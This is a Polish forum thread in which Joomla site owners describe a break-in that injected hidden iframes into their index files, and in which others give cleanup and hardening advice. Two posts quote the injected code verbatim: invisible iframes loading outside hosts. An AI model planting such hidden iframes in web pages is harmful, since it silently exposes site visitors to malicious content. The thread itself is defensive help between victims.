Niechciane iframe w plikach index

[kmtychy]

Witam,
korzystam z Joomla 1.5.8 i w dniu dzisiejszym o 15.00 wszystkie pliki index oraz home (php, html) na serwerze dostały dopisek:

Kod PHP:

<?php echo '<div style="visibility:hidden"><iframe src="http://directlinkq.cn/in.cgi?27" width=100 height=80></iframe></div>'; ?>

Niezwłocznie wgrałem kopie wszystkich plików bez tych dopisków i zmieniłem hasła.
Czy jest jakiś sposób na uniknięcie takich wypadków w przyszłości? Chmody miałem ustawione wszędzie zgodnie z zaleceniami.
Jeżeli ktoś ma jakieś doświadczenia w podobnej sprawie, to bardzo proszę o pomoc.

[Dylek]

poczytaj

[kmtychy]

Czytałem już to wcześniej
A tak na poważnie, to jest jakiś złoty środek na tego typu zdarzenia? Wszystkie prawa dostępu mam ustawione na 755 foldery i 644 pliki.

[sylwekb]

Mnie także to spotkało 22.12 ale na Joomla 1,015, dopisek do wszystkich plików index
<iframe src="http://thedeadpit.com/?click=406546" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Hasła mam dość wymyślne, chmody także solidne, a tu taka nimiła niespodzianka. Jak się przed tym paskudztwem można jeszcze zabezpieczyć ?

[Dylek]

Pamietajcie podstawowa rzecz - chocby najnowsza Joomla - to wlamy najczesciej sa przez STARE dodatkowe skladniki - komponenty itp.

[kmtychy]

Ja się czuję bezsilny, bo korzystam z najnowszej wersji Joomla 1.5.8, wszystkie komponenty są również uaktualnione do aktualnych edycji. Więc nie mam czego uaktualnić na chwilę obecną.
Chmody ustawione według zaleceń, hasła pozmieniałem po ataku, przywróciłem na serwer właściwe pliki index. Na razie jest spokój, ale tylko czekać na powtórkę z rozrywki.
Najgorsze, że nigdzie nie można znaleźć jakiejś konkretnej metody co dokładnie można zrobić, aby zapobiec tym wkurzającym działaniom. Przeszukałem zagraniczne fota i nic konkretnego.

[fooky]

dobra - a co zrobić jeśli już taki złośliwiec się pokarze w plikach a nie ma możliwości skorzystania z Backupu?

U mnie sprawa wygląda tak, ze iframe (linku nie podaje, bo jeszcze ktoś kliknie) Pojawia sie na każdej podstronie gdzie mają się pojawić artykuły.

na podstronei z Forum, czy formularzem kontaktowym nie ma.
Problem w tym, ze nei wiem gdzie szukac tego fragmentu kodu, bu go poprostu skasowac...

Czy ktloś ma jakiś pomysl?

[sylwekb]

Wtedy pozostaje zastosować Windows Commandera i wszystkie zmodyfikowane przez trojana pliki trzeba poprawić i wyciąć iframe ręcznie. Sam to przerobiłem. Głównie są zmodyfikowane pliki index. szablonów, componentów, modułów

[zwiastun]

Zapomniałeś dodać, że tego Windows Commandera trzeba najpierw odwirusować!

[sylwekb]

Tak oczywiście odwirusować i to odpalając program antywirusowy w trybie awaryjnym systemu bo niektóre klony tego trojana usuwane bezprośrednio w trybie normalnym pojawiają się ponownie i trzeba ponownie rzeźbić pliki. Poza tym po usunięciu trojana, koniecznie zmienić hasło do FTP i Joomla.